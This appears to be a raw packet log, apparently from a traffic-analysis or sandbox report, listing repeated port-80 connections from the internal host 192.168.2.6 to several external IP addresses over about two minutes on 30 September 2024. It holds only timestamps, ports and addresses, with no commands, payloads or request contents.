                                                                                      Sep 30, 2024 10:42:11.349627972 CEST5877580192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:11.354518890 CEST80587753.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:42:12.706681967 CEST80587753.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:42:12.706790924 CEST5877580192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:12.858910084 CEST5877580192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:12.863761902 CEST80587753.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:42:13.878674030 CEST5877680192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:14.392374992 CEST80587763.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:42:14.392559052 CEST5877680192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:14.403007984 CEST5877680192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:14.407866955 CEST80587763.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:42:14.407968998 CEST80587763.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:42:15.905944109 CEST5877680192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:15.911007881 CEST80587763.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:42:15.911073923 CEST5877680192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:16.924072027 CEST5877780192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:16.928922892 CEST80587773.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:42:16.929013014 CEST5877780192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:16.938992977 CEST5877780192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:16.943831921 CEST80587773.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:42:17.405038118 CEST80587773.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:42:17.405142069 CEST80587773.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:42:17.405251026 CEST5877780192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:17.409008980 CEST5877780192.168.2.63.33.130.190
                                                                                      Sep 30, 2024 10:42:17.413773060 CEST80587773.33.130.190192.168.2.6
                                                                                      Sep 30, 2024 10:42:22.446302891 CEST5877980192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:22.451132059 CEST8058779203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:22.451225042 CEST5877980192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:22.466061115 CEST5877980192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:22.470882893 CEST8058779203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:23.054466963 CEST8058779203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:23.054528952 CEST8058779203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:23.054600000 CEST5877980192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:23.968348026 CEST5877980192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:25.018873930 CEST5878080192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:25.025062084 CEST8058780203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:25.025141954 CEST5878080192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:25.035911083 CEST5878080192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:25.041913033 CEST8058780203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:25.636146069 CEST8058780203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:25.636277914 CEST8058780203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:25.636332035 CEST5878080192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:26.546499968 CEST5878080192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:27.567946911 CEST5878180192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:27.572877884 CEST8058781203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:27.573035002 CEST5878180192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:27.583364964 CEST5878180192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:27.588242054 CEST8058781203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:27.588294983 CEST8058781203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:28.158399105 CEST8058781203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:28.158515930 CEST8058781203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:28.158562899 CEST5878180192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:29.093385935 CEST5878180192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:30.113639116 CEST5878280192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:30.118484974 CEST8058782203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:30.118594885 CEST5878280192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:30.125570059 CEST5878280192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:30.130465031 CEST8058782203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:30.704447031 CEST8058782203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:30.704524994 CEST8058782203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:30.704830885 CEST5878280192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:30.707401991 CEST5878280192.168.2.6203.161.41.205
                                                                                      Sep 30, 2024 10:42:30.712104082 CEST8058782203.161.41.205192.168.2.6
                                                                                      Sep 30, 2024 10:42:35.822041035 CEST5878380192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:35.827085018 CEST805878365.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:35.827166080 CEST5878380192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:35.840297937 CEST5878380192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:35.845397949 CEST805878365.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:36.838613987 CEST805878365.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:36.838633060 CEST805878365.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:36.838645935 CEST805878365.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:36.838706970 CEST5878380192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:36.838753939 CEST5878380192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:36.839123964 CEST805878365.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:36.839193106 CEST5878380192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:37.346376896 CEST5878380192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:38.362076998 CEST5878480192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:38.366971970 CEST805878465.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:38.367167950 CEST5878480192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:38.378262997 CEST5878480192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:38.383140087 CEST805878465.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:39.054147959 CEST805878465.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:39.054169893 CEST805878465.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:39.054222107 CEST5878480192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:39.890594959 CEST5878480192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:40.908314943 CEST5878580192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:40.913254976 CEST805878565.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:40.913332939 CEST5878580192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:40.922142029 CEST5878580192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:40.926955938 CEST805878565.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:40.927032948 CEST805878565.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:41.574207067 CEST805878565.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:41.574263096 CEST805878565.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:41.574326992 CEST5878580192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:42.437743902 CEST5878580192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:43.560565948 CEST5878680192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:43.565619946 CEST805878665.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:43.567053080 CEST5878680192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:43.577182055 CEST5878680192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:43.582092047 CEST805878665.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:44.316797972 CEST805878665.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:44.316821098 CEST805878665.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:44.317039013 CEST805878665.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:44.317064047 CEST5878680192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:44.317095995 CEST5878680192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:44.319830894 CEST5878680192.168.2.665.21.196.90
                                                                                      Sep 30, 2024 10:42:44.324795008 CEST805878665.21.196.90192.168.2.6
                                                                                      Sep 30, 2024 10:42:49.705526114 CEST5878780192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:42:49.710468054 CEST8058787172.217.31.4192.168.2.6
                                                                                      Sep 30, 2024 10:42:49.710552931 CEST5878780192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:42:49.721344948 CEST5878780192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:42:49.727318048 CEST8058787172.217.31.4192.168.2.6
                                                                                      Sep 30, 2024 10:42:51.233803988 CEST5878780192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:42:51.280714989 CEST8058787172.217.31.4192.168.2.6
                                                                                      Sep 30, 2024 10:42:52.368335009 CEST5878880192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:42:52.374008894 CEST8058788172.217.31.4192.168.2.6
                                                                                      Sep 30, 2024 10:42:52.374104977 CEST5878880192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:42:52.460562944 CEST5878880192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:42:52.465501070 CEST8058788172.217.31.4192.168.2.6
                                                                                      Sep 30, 2024 10:42:53.969026089 CEST5878880192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:42:54.280575037 CEST5878880192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:42:54.285368919 CEST8058788172.217.31.4192.168.2.6
                                                                                      Sep 30, 2024 10:42:54.993283033 CEST5878980192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:42:54.998157024 CEST8058789172.217.31.4192.168.2.6
                                                                                      Sep 30, 2024 10:42:54.998322964 CEST5878980192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:42:55.052644014 CEST5878980192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:42:55.057559967 CEST8058789172.217.31.4192.168.2.6
                                                                                      Sep 30, 2024 10:42:55.057631016 CEST8058789172.217.31.4192.168.2.6
                                                                                      Sep 30, 2024 10:42:56.561911106 CEST5878980192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:42:56.608653069 CEST8058789172.217.31.4192.168.2.6
                                                                                      Sep 30, 2024 10:42:57.580715895 CEST5879080192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:42:57.585649967 CEST8058790172.217.31.4192.168.2.6
                                                                                      Sep 30, 2024 10:42:57.585829020 CEST5879080192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:42:57.593101025 CEST5879080192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:42:57.598124981 CEST8058790172.217.31.4192.168.2.6
                                                                                      Sep 30, 2024 10:43:11.061749935 CEST8058787172.217.31.4192.168.2.6
                                                                                      Sep 30, 2024 10:43:11.063062906 CEST5878780192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:43:13.749370098 CEST8058788172.217.31.4192.168.2.6
                                                                                      Sep 30, 2024 10:43:13.749779940 CEST5878880192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:43:16.360604048 CEST8058789172.217.31.4192.168.2.6
                                                                                      Sep 30, 2024 10:43:16.360687971 CEST5878980192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:43:18.987422943 CEST8058790172.217.31.4192.168.2.6
                                                                                      Sep 30, 2024 10:43:18.987590075 CEST5879080192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:43:19.004479885 CEST5879080192.168.2.6172.217.31.4
                                                                                      Sep 30, 2024 10:43:19.009697914 CEST8058790172.217.31.4192.168.2.6
                                                                                      Sep 30, 2024 10:43:24.592015982 CEST5879280192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:24.596863985 CEST8058792121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:24.596988916 CEST5879280192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:24.612797976 CEST5879280192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:24.619241953 CEST8058792121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:25.502182007 CEST8058792121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:25.502204895 CEST8058792121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:25.502520084 CEST5879280192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:26.124608994 CEST5879280192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:27.143058062 CEST5879380192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:27.147974014 CEST8058793121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:27.151040077 CEST5879380192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:27.162957907 CEST5879380192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:27.167800903 CEST8058793121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:28.046238899 CEST8058793121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:28.046284914 CEST8058793121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:28.046525955 CEST5879380192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:28.671341896 CEST5879380192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:29.690028906 CEST5879480192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:29.694943905 CEST8058794121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:29.695086956 CEST5879480192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:29.707602978 CEST5879480192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:29.712490082 CEST8058794121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:29.712573051 CEST8058794121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:30.623109102 CEST8058794121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:30.623135090 CEST8058794121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:30.623194933 CEST5879480192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:31.222949028 CEST5879480192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:32.238253117 CEST5879580192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:32.243316889 CEST8058795121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:32.243479013 CEST5879580192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:32.253868103 CEST5879580192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:32.258759975 CEST8058795121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:33.189517021 CEST8058795121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:33.189861059 CEST8058795121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:33.190836906 CEST5879580192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:33.192733049 CEST5879580192.168.2.6121.254.178.239
                                                                                      Sep 30, 2024 10:43:33.197552919 CEST8058795121.254.178.239192.168.2.6
                                                                                      Sep 30, 2024 10:43:38.553236008 CEST5879680192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:38.558094978 CEST8058796202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:38.558190107 CEST5879680192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:38.569961071 CEST5879680192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:38.574945927 CEST8058796202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:39.463545084 CEST8058796202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:39.463630915 CEST8058796202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:39.463795900 CEST5879680192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:40.079792976 CEST5879680192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:41.096127987 CEST5879780192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:41.101239920 CEST8058797202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:41.110981941 CEST5879780192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:41.118943930 CEST5879780192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:41.123785019 CEST8058797202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:42.028368950 CEST8058797202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:42.028430939 CEST8058797202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:42.028573036 CEST5879780192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:42.627191067 CEST5879780192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:43.644072056 CEST5879880192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:43.648920059 CEST8058798202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:43.649018049 CEST5879880192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:43.659212112 CEST5879880192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:43.664072037 CEST8058798202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:43.664129019 CEST8058798202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:44.550617933 CEST8058798202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:44.550641060 CEST8058798202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:44.550715923 CEST5879880192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:45.171590090 CEST5879880192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:46.191406012 CEST5879980192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:46.196444035 CEST8058799202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:46.196532011 CEST5879980192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:46.204901934 CEST5879980192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:46.209759951 CEST8058799202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:47.099808931 CEST8058799202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:47.099832058 CEST8058799202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:47.100316048 CEST5879980192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:47.102910995 CEST5879980192.168.2.6202.87.223.248
                                                                                      Sep 30, 2024 10:43:47.107898951 CEST8058799202.87.223.248192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.165697098 CEST5880080192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:52.170581102 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.170655966 CEST5880080192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:52.182126045 CEST5880080192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:52.187058926 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.818250895 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.818305969 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.818344116 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.818377018 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.818376064 CEST5880080192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:52.818432093 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.818464041 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.818491936 CEST5880080192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:52.818497896 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.818516016 CEST5880080192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:52.818547964 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.818582058 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.818595886 CEST5880080192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:52.818619967 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.818672895 CEST5880080192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:52.823740959 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.823797941 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.823829889 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.823847055 CEST5880080192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:52.823863029 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.823914051 CEST5880080192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:52.916331053 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.916376114 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.916412115 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.916445971 CEST8058800217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:52.916543007 CEST5880080192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:53.690952063 CEST5880080192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:54.813616991 CEST5880180192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:54.818777084 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:54.818864107 CEST5880180192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:54.864149094 CEST5880180192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:54.869134903 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.482134104 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.482217073 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.482253075 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.482285023 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.482316971 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.482321978 CEST5880180192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:55.482361078 CEST5880180192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:55.482371092 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.482405901 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.482422113 CEST5880180192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:55.482439041 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.482470989 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.482492924 CEST5880180192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:55.482506990 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.482562065 CEST5880180192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:55.487468004 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.487500906 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.487535954 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.487571001 CEST5880180192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:55.577364922 CEST5880180192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:55.580250025 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.580292940 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.580332041 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.580367088 CEST8058801217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:55.580368996 CEST5880180192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:55.580437899 CEST5880180192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:56.374320984 CEST5880180192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:57.494960070 CEST5880280192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:57.499969006 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:57.500085115 CEST5880280192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:57.514091015 CEST5880280192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:57.519073009 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:57.519109011 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.163693905 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.163750887 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.163786888 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.163806915 CEST5880280192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:58.163820982 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.163856030 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.163876057 CEST5880280192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:58.163892031 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.163927078 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.163935900 CEST5880280192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:58.163984060 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.164017916 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.164028883 CEST5880280192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:58.164072037 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.164117098 CEST5880280192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:58.169665098 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.169684887 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.169698000 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.169730902 CEST5880280192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:58.261921883 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.261939049 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.261950970 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.261992931 CEST5880280192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:58.262038946 CEST5880280192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:58.262070894 CEST8058802217.160.0.158192.168.2.6
                                                                                      Sep 30, 2024 10:43:58.262159109 CEST5880280192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:43:59.015094995 CEST5880280192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.033665895 CEST5880380192.168.2.6217.160.0.158
                                                                                      Sep 30, 2024 10:44:00.039899111 CEST8058803217.160.0.158192.168.2.6
